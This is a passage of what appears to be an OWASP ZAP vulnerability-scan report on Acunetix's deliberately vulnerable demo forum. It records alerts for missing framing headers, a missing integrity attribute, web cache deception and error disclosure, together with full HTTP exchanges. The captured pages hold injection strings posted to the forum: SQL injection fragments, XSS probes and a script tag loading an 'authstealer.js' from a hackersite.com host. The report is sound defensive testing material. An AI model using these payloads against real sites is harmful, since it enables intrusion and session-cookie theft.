InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=7 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3068 |
| Response Body - size: 3,068 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3057 |
| Response Body - size: 3,057 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=9 |
| Method | POST |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 407 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=9 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3063 |
| Response Body - size: 3,063 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 187 |
| Solution |
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.
If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
|
| Reference | https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options |
| Tags |
OWASP_2021_A05
WSTG-v42-CLNT-09 OWASP_2017_A06 |
| CWE Id | 1021 |
| WASC Id | 15 |
| Plugin Id | 10020 |
|
Medium |
Sub Resource Integrity Attribute Missing |
|---|---|
| Description |
The integrity attribute is missing on a script or link tag served by an external server. The integrity tag prevents an attacker who have gained access to this server from injecting a malicious content.
|
| URL | http://testasp.vulnweb.com/showforum.asp?id=2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <script src=http://hackersite.com/authstealer.js> </script> |
| Request Header - size: 316 bytes. |
GET http://testasp.vulnweb.com/showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:23 GMT Content-Length: 4017 |
| Response Body - size: 4,017 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Miscellaneous</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Miscellaneous </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>ÑайÑ</a></div></td><td>1</td><td>Jamesaidem</td><td>3/13/2022 10:17:25 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>Testing</a></div></td><td>1</td><td> </td><td>3/13/2022 3:11:02 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'><script>doSomethingEvil();</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:31:45 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'><script src=http://hackersite.com/authstealer.js> </script>.</a></div></td><td>1</td><td> </td><td>3/13/2022 3:33:39 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'><script>alert('Hello')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:05 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'><script>alert('BELLO')</script></a></div></td><td>1</td><td> </td><td>3/13/2022 3:34:42 PM</td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 1 |
| Solution |
Provide a valid integrity attribute to the tag.
|
| Reference | https://developer.mozilla.org/en/docs/Web/Security/Subresource_Integrity |
| Tags |
OWASP_2021_A05
OWASP_2017_A06 |
| CWE Id | 345 |
| WASC Id | 15 |
| Plugin Id | 90003 |
|
Medium |
Web Cache Deception |
|---|---|
| Description |
Web cache deception may be possible. It may be possible for unauthorised user to view sensitive data on this page.
|
| URL | http://testasp.vulnweb.com/avatars |
| Method | GET |
| Parameter | |
| Attack | /test.css,/test.jpg,/test.js,/test.html,/test.gif,/test.png,/test.svg,/test.php,/test.txt,/test.pdf,/test.asp, |
| Evidence | |
| Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/avatars HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:22:02 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Images |
| Method | GET |
| Parameter | |
| Attack | /test.css,/test.jpg,/test.js,/test.html,/test.gif,/test.png,/test.svg,/test.php,/test.txt,/test.pdf,/test.asp, |
| Evidence | |
| Request Header - size: 323 bytes. |
GET http://testasp.vulnweb.com/Images HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:22:09 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | |
| Attack | /test.css,/test.jpg,/test.js,/test.html,/test.gif,/test.png,/test.svg,/test.php,/test.txt,/test.pdf,/test.asp, |
| Evidence | |
| Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:22:16 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | |
| Attack | /test.css,/test.jpg,/test.js,/test.html,/test.gif,/test.png,/test.svg,/test.php,/test.txt,/test.pdf,/test.asp, |
| Evidence | |
| Request Header - size: 354 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:22:22 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | /test.css,/test.jpg,/test.js,/test.html,/test.gif,/test.png,/test.svg,/test.php,/test.txt,/test.pdf,/test.asp, |
| Evidence | |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:21:54 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| Instances | 5 |
| Solution |
It is strongly advised to refrain from classifying file types, such as images or stylesheets solely by their URL and file extension. Instead you should make sure that files are cached based on their Content-Type header.
|
| Reference |
https://blogs.akamai.com/2017/03/on-web-cache-deception-attacks.html
https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/web-cache-deception/ |
| Tags |
OWASP_2021_A05
WSTG-v42-ATHN-06 OWASP_2017_A06 |
| CWE Id | |
| WASC Id | |
| Plugin Id | 40039 |
|
Low |
Application Error Disclosure |
|---|---|
| Description |
This page contains an error/warning message that may disclose sensitive information like the location of the file that produced the unhandled exception. This information can be used to launch further attacks against the web application. The alert could be a false positive if the error message is found inside a documentation page.
|
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | HTTP/1.1 500 Internal Server Error |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
